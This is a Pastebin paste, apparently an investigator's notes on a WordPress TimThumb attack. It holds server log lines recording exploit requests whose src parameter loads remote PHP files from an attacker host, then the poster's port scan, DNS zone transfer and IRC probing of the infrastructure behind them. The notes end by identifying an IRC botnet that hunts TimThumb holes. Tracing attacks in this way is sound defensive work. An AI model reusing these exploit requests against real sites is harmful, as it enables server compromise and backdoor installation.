API tools faq
paste
Advertisement
Guest User

justicesolutionsllc

a guest
May 28th, 2012
834
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.70 KB | None | 0 0
raw download clone embed print report
  1.  
  2. server1.justicesolutionsllc.com - - [28/May/2012:09:57:59 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  3. server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  4. server1.justicesolutionsllc.com - - [28/May/2012:09:59:26 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  5. server1.justicesolutionsllc.com - - [28/May/2012:09:59:27 -0700] "GET //wp-content/themes/magazinum/scripts/timthumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  6. server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/lin.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  7. server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/both.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  8. server1.justicesolutionsllc.com - - [28/May/2012:09:59:28 -0700] "GET //wp-content/themes/magazinum/scripts/thumb.php?src=http://blogger.com.lochin.org/nina.php HTTP/1.1" 503 291 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1b2) Gecko/20060710 Firefox/2.0b2"
  9.  
  10. http://justicesolutionsllc.com/
  11.  
  12.  
  13. nmap --open --reason --script dns-zone-transfer.nse justicesolutionsllc.com
  14. Starting Nmap 6.00 ( http://nmap.org ) at 2012-05-28 18:38 Eastern Daylight Time
  15.  
  16. Nmap scan report for justicesolutionsllc.com (216.67.225.113)
  17. Host is up, received reset (0.026s latency).
  18. rDNS record for 216.67.225.113: server1.justicesolutionsllc.com
  19. Not shown: 979 closed ports
  20. Reason: 979 resets
  21.  
  22. PORT STATE SERVICE REASON
  23. 1/tcp open tcpmux syn-ack
  24. 21/tcp open ftp syn-ack
  25. 25/tcp open smtp syn-ack
  26. 53/tcp open domain syn-ack
  27. | dns-zone-transfer:
  28. | justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
  29. | justicesolutionsllc.com MX justicesolutionsllc.com
  30. | justicesolutionsllc.com NS ns1.justicesolutionsllc.com
  31. | justicesolutionsllc.com NS ns2.justicesolutionsllc.com
  32. | justicesolutionsllc.com A 216.67.225.113
  33. | cpanel.justicesolutionsllc.com A 216.67.225.113
  34. | ftp.justicesolutionsllc.com A 216.67.225.113
  35. | localhost.justicesolutionsllc.com A 127.0.0.1
  36. | mail.justicesolutionsllc.com CNAME justicesolutionsllc.com
  37. | ns1.justicesolutionsllc.com A 216.67.225.113
  38. | ns2.justicesolutionsllc.com A 208.116.44.41
  39. | server1.justicesolutionsllc.com A 208.116.44.41
  40. | webdisk.justicesolutionsllc.com A 216.67.225.113
  41. | webmail.justicesolutionsllc.com A 216.67.225.113
  42. | whm.justicesolutionsllc.com A 216.67.225.113
  43. | www.justicesolutionsllc.com CNAME justicesolutionsllc.com
  44. |_justicesolutionsllc.com SOA ns1.justicesolutionsllc.com dnsadmin.server1.justicesolutionsllc.com
  45. 80/tcp open http syn-ack
  46. 100/tcp open newacct syn-ack
  47. 110/tcp open pop3 syn-ack
  48. 111/tcp open rpcbind syn-ack
  49. 143/tcp open imap syn-ack
  50. 443/tcp open https syn-ack
  51. 465/tcp open smtps syn-ack
  52. 587/tcp open submission syn-ack
  53. 993/tcp open imaps syn-ack
  54. 995/tcp open pop3s syn-ack
  55. 3306/tcp open mysql syn-ack
  56. 6667/tcp open irc syn-ack
  57. 6668/tcp open irc syn-ack
  58. 6669/tcp open irc syn-ack
  59. 7000/tcp open afs3-fileserver syn-ack
  60. 8000/tcp open http-alt syn-ack
  61. 8001/tcp open vcom-tunnel syn-ack
  62.  
  63. | server1.justicesolutionsllc.com A 208.116.44.41
  64. 208.116.44.41 redirects to wylandflorida.com
  65. Non-authoritative answer:
  66. Name: wylandflorida.com
  67. Address: 216.67.225.113
  68.  
  69. wylandflorida.com comes back to 216.67.225.113 which aliases to server1.justicesolutionsllc.com
  70.  
  71. http://justicesolutionsllc.com:6669 = irc.siantar.org
  72.  
  73. :server1.siantar.org NOTICE AUTH :*** Looking up your hostname...
  74. :server1.siantar.org NOTICE AUTH :*** Checking ident...
  75. :server1.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
  76. :server1.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
  77. :server1.siantar.org 451 GET :You have not registered
  78. :server1.siantar.org 451 User-Agent: :You have not registered
  79. :server1.siantar.org 451 Host: :You have not registered
  80. :server1.siantar.org 451 Accept: :You have not registered
  81. :server1.siantar.org 451 Accept-Language: :You have not registered
  82. :server1.siantar.org 451 Accept-Encoding: :You have not registered
  83. :server1.siantar.org 451 Connection: :You have not registered
  84.  
  85. PING irc.siantar.org (173.44.171.98) 56(84) bytes of data.
  86. http://173.44.171.98:6669/
  87. :server2.siantar.org NOTICE AUTH :*** Looking up your hostname...
  88. :server2.siantar.org NOTICE AUTH :*** Checking ident...
  89. :server2.siantar.org NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
  90. :server2.siantar.org NOTICE AUTH :*** No ident response; username prefixed with ~
  91. :server2.siantar.org 451 GET :You have not registered
  92. :server2.siantar.org 451 User-Agent: :You have not registered
  93. :server2.siantar.org 451 Host: :You have not registered
  94. :server2.siantar.org 451 Accept: :You have not registered
  95. :server2.siantar.org 451 Accept-Language: :You have not registered
  96. :server2.siantar.org 451 Accept-Encoding: :You have not registered
  97. :server2.siantar.org 451 Connection: :You have not registered
  98.  
  99. siantar.org redirects to http://globalnetsiantar.blogspot.com/
  100.  
  101. http://blogger.com.lochin.org/
  102.  
  103. Non-authoritative answer:
  104. Name: lochin.org
  105. Address: 94.141.22.74
  106.  
  107. Non-authoritative answer:
  108. Name: blogger.com.lochin.org
  109. Address: 94.141.22.74
  110.  
  111. Name: srv-hp6.netsons.net
  112. Address: 94.141.22.74
  113.  
  114. ____________________________________________
  115.  
  116.  
  117. irc.siantar.org channels used to scan websites for TimThumb vulns, bots post back findings and list backdoors installed on servers.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!